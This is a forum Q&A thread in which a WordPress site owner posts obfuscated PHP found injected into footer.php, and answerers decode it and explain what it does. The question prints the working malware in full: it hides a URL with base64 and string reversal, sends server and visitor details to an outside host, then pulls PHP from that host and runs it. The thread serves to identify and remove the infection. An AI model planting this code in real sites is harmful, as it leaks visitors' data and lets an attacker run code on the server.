# What is this Unknown Codes appeared in my WP site footer.php? is this hacking

Tags: php

What is this Unknown Codes appeared in my WP site footer.php? is this hacking

Some one has injected this code into my wordpress site footer.php:

```
<?php
$cf=strrev('edo'.'ced'.'_46esab');$counter=$cf('aHR0cDovL3NpdGVzY3VscHRvci5iaXovbC5waHA/aWQ9').md5($_SERVER['SERVER_NAME']);
$data=array('HTTP_ACCEPT_CHARSET','HTTP_ACCEPT_LANGUAGE','HTTP_HOST','HTTP_REFERER',
'HTTP_USER_AGENT','HTTP_QUERY_STRING','REMOTE_ADDR','REQUEST_URI','REQUEST_METHOD','SCRIPT_FILENAME');
foreach($data as $val){$t[]=$_SERVER[$val];}$u=$counter.'&data='.base64_encode(serialize($t));$fn=file_get_contents($u);
if(!$fn||strlen($fn)<4){ob_start();include($u);$fn=ob_get_contents();ob_clean();}
if($fn&&strlen($fn)>4){list($crc,$enc)=explode('::',$fn);if(md5($enc)==$crc){echo $cf($enc);}}
?>
```

What is this?

Comment: This might be better suited for WebMasters , but I'll try to answer it anyway.

Answer (score 1):

Yes. This seems to be a known hacking attempt. You would be better off removing it immediately then securing your blog through deleting unsecure plugins and downloading security solutions for WP.

Answer (score 0):

```
<?php
$cf = base64_decode('aHR0cDovL3NpdGVzY3VscHRvci5iaXovbC5waHA/aWQ9');
  echo $cf;
?>       


http://sitesculptor.biz/l.php?id=
```

then,

```
md5($_SERVER['SERVER_NAME']);
```

Answer (score 0):

counter decodes to `http://sitesculptor.biz/l.php?id=`. the code (based on url parameters) will fetch a code snippet from there and will execute it.

Definitely hacking.

Answer (score 0):

It could very well be malicious. It sends all of your server details to a URL at `http://sitesculptor.biz/l.php?id=` and then includes any PHP returned in your scripts.